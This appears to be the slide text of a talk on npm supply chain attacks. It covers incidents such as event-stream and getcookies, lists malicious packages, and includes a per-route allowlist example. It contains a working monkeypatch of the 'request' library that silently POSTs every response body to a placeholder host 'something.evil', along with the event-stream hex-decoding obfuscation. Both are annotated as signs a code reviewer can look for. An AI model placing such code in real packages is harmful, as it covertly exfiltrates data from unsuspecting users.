I'm writing Distributed Systems with Node.js: bit.ly/34SHToF
$ npx @intrinsic/loc
Your application code: 68,490 lines ( 2.44%)
`node_modules` code: 2,740,694 lines (97.56%)
We've become quite the lucrative target.
A supply chain attack is a cyber-attack that seeks to damage an organization by targeting less-secure elements in the supply network. – Wikipedia
left-pad
getcookies
getcookies
was a deep dep of mailparser
mailparser
had 64,000 weekly downloads
event-stream
flatmap-stream
added as dep
description field of Copay
bookeyman: Feb 13, 2019
stream-combine@2.0.2: Feb 10, 2019
portionfatty12: Jan 15, 2019
rrgod: Jan 15, 2019
text-qrcode: Jan 10, 2019
commander-js: Jan 9, 2019
eslint-config-eslint@5.0.2: Jul 13, 2018
Source: Snyk Vulnerability DB
// Illustrative exfiltration pattern from the talk (the hostname is a placeholder).
// Review tells a defender can look for in a dependency: (1) one package
// overwriting a property on another module's export, (2) a user-supplied
// callback swapped for one that contacts a host the caller never asked for,
// and (3) the original callback still invoked afterwards so the application
// observes no change in behavior.
const REQUEST = require('request');
const _Req = REQUEST.Request;
REQUEST.Request = (opts) => { // monkeypatch
// Keep the caller's callback so it can be forwarded unchanged below.
const _callback = opts.callback;
opts.callback = function (_e, _r, body) {
// Every response body that passes through `request` is POSTed, JSON-encoded,
// to a third-party host before the caller ever sees it.
const req = require('http').request({
hostname: 'something.evil', method: 'POST'
});
req.write(JSON.stringify(body)).end();
// Forwarding the original callback with the original arguments is what keeps
// the patch invisible to the application.
_callback.apply(this, arguments);
};
// Intended to serve both `new Request(opts)` and plain `Request(opts)` callers.
return new.target ?
Reflect.construct(_Req, [opts]) : _Req(opts);
};
event-stream
// The event-stream incident used encoded strings: names were hex-encoded so the
// real identifiers (e.g. 'createDecipher') never appear literally in the source.
// `d` turns such a hex string back into text.
function d(str) {
  // Buffer's default text encoding is utf8; spelled out here for clarity.
  const bytes = Buffer.from(str, 'hex');
  return bytes.toString('utf8');
}
// How the decoder was used: a literal that looks like noise resolves to an API name.
d("6372656174654465636970686572"); // "createDecipher"
// Minified form from the incident: module name, property name and argument are
// all decoded from entries of an array `n` (not shown on this page). As
// transcribed here the line is missing a closing parenthesis.
require(d(n[2]))[d(n[6])](d(n[5]); // minified version
// What the line above resolves to: crypto.createDecipher, keyed on `pkgDesc`
// (presumably the package description mentioned earlier on this page). Review
// tells: require() with a computed argument, bracket property access with
// computed names, and a cipher keyed on package metadata rather than on config.
require('crypto')['createDecipher']('aes256', pkgDesc);
--allow-write, --allow-net
request
be?Socket
instance?
const PG = 'postgres://pguser@pghost:9876/auth';
const REDIS = 'redis://redishost:6379/1';

// Per-route allowlist policy. The `routes`/`policy` API is not shown on this
// page; presumably anything not listed below is denied at runtime — confirm
// against the policy library's documentation.

// Baseline for every route: connections to the two backends, nothing else.
function allowBackendConnections(policy) {
  policy.sql.allowConnect(PG);
  policy.redis.allowConnect(REDIS);
}

// Read path: one Redis command on one key pattern and one SQL statement.
function allowUserLookups(policy) {
  policy.redis.allowCommandKey(REDIS, 'GET', 'user-*');
  policy.sql.allowQuery(PG, 'SELECT * FROM users');
}

// Admin lock: a single writable path and a single outbound GET to a fixed URL.
function allowAdminLock(policy) {
  policy.fs.allowWrite('/tmp/app.lock');
  policy.outboundHttp.allowGet('http://example.org/');
}

routes.allRoutes(allowBackendConnections);
routes.get('/users/*', allowUserLookups);
routes.post('/admin/lock', allowAdminLock);
Run `npm audit` periodically, update when possible.
.npmrc
password with token
npm audit
bit.ly/2ysIjUc
bit.ly/2FL0AzJ
bit.ly/2sFDwYX
@tlhunter@mastodon.social
intrinsic.com
diff.intrinsic.com
bit.ly/2IWa50A
bit.ly/34SHToF